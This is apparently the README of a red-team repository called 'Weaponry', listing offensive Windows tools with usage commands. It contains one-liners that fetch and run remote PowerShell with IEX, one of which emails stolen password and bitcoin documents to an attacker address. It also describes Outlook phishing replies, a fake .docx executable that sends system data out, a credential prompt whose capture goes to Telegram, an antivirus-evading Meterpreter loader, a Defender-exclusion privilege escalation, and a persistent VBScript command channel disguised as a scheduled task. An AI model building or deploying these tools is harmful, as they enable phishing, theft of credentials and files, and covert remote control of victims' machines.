A collection of offensive code used for red team engagements.
Usage: powershell IEX (iwr 'https://raw.githubusercontent.com/jeffjbowie/Weaponry/master/OLRP.ps1'); ReplyP -Subject "tokens" -URL "http://training.aliasinfosec.com"
* Creates instance of Outlook COM Object
* Searches Inbox for messages sorted by newest, which contain the specified term in the subject line.
* Replies to the newest message with a personalized response containing a phishing link.
Usage: powershell IEX (IWR 'https://raw.githubusercontent.com/jeffjbowie/Weaponry/master/OutlookDocStealer.ps1'); Vicious -SendTo "attacker.controlled@email.com"
* Start new Outlook instance via COM object.
* Create a new message, with a Subject of "DOMAIN\USERNAME".
* Scan %userprofile%\Documents for file names containing : "password", "login", "bitcoin", and "account".
* If found files are < 25MB, attach to e-mail message.
* Send message to attacker-controlled e-mail account.
* Prompt user to "authenticate" with a custom message.
* Send captured plain-text to a Telegram account.
C# .NET Executable which exfiltrates system information via publicy-accessible HTTP request inspectors.
Writes a Word document (Base64-Encoded String) in %TEMP% , and opens via System.Diagnostics.Process.Start
* Use Resource Hacker (http://www.angusj.com/resourcehacker/) to extract the .ico from WINWORD.exe
* Create a new C# Project with Visual Studio. Set project's "Output type" to "Windows Application"
* Under "Resources" in the project's properties, select the icon extracted from WINWORD.exe
* Create a Word document and encode with Base64. (https://base64.guru/converter/encode/file)
* Update variable "doc_b64" in DocumentDupe.cs with Base64 string.
* Update second argument of postdata() with a string containing the URL of a request debugging site. Make sure to check "Make Private" (hookbin.com).
* Compile the Release build of your project for the appropriate architecture.
* Rename .exe in bin/Release to "<Lure_Name>.docx.exe"
Usage: powershell IEX (IWR 'https://raw.githubusercontent.com/jeffjbowie/Weaponry/master/OEF.ps1'); OEF -To "attacker.controlled@email.com"
* Uses an Outlook COM object to send system information to the specified e-mail address:
- Windows OS, A/V Version, Language, Architecture, Admin?, & External IP.
* Basic shell code loader. (Credit: https://ired.team)
* Uses subprocess to call MSFVenom, creating a reverse TCP payload with supplied LHOST and LPORT parameters, saving C payload to a temporary file.
* Loads temporary file, replacing standard variable names with random values of varying lengths, altering static signature of the executable.
* Outputs modified Meterpeter payload in C for compilation with Visual Studio Community
TODO: Add in "junk" logic, more anti-debug.
* Writes Add-MpPreference -ExclusionExtension (".exe", ".dll") to a file in %TEMP%
* Uses SDCLT.exe to escalate privileges and call above script.
* Once EXE & DLLs are excluded, Meterpreter payload is downloaded + executed.
* Remove PS1 from %TEMP%
* Restore SDCLT.exe functionality.
* Grab Username + Domain
* Grab OS Name, Build #, Processor Architecture
* Grab Local IP
* Grab External IP from API (ipconfig.me)
* Geolocate external IP from API (ip-api.com)
* Grab user language
* Builds a hashtable of all above values, and encodes to JSON.
* Sends JSON to Telegram API with pre-configured Token + Message ID.
* Check for Mutex in %TEMP%/<mutex_filename>. If doesn't exist:
* Create %TEMP%/<mutex_filename>
* Create a random file in %TEMP% appended with ".vbs"
* Write VBScript payload to %TEMP%/<random_name>.vbs, which checks an HTTP URL for a Batch/PowerShell command.
* Command is pre-pended with either bat: or ps1:
ps1:Invoke-Item c:\windows\system32\calc.exe
* Generates a list of Scheduled Tasks.
* Identifies & duplicates the name of an existing Scheduled Task.
* Creates a scheduled task with modified existing Task Name, executing %TEMP%/<random_name>.vbs every 10 minutes.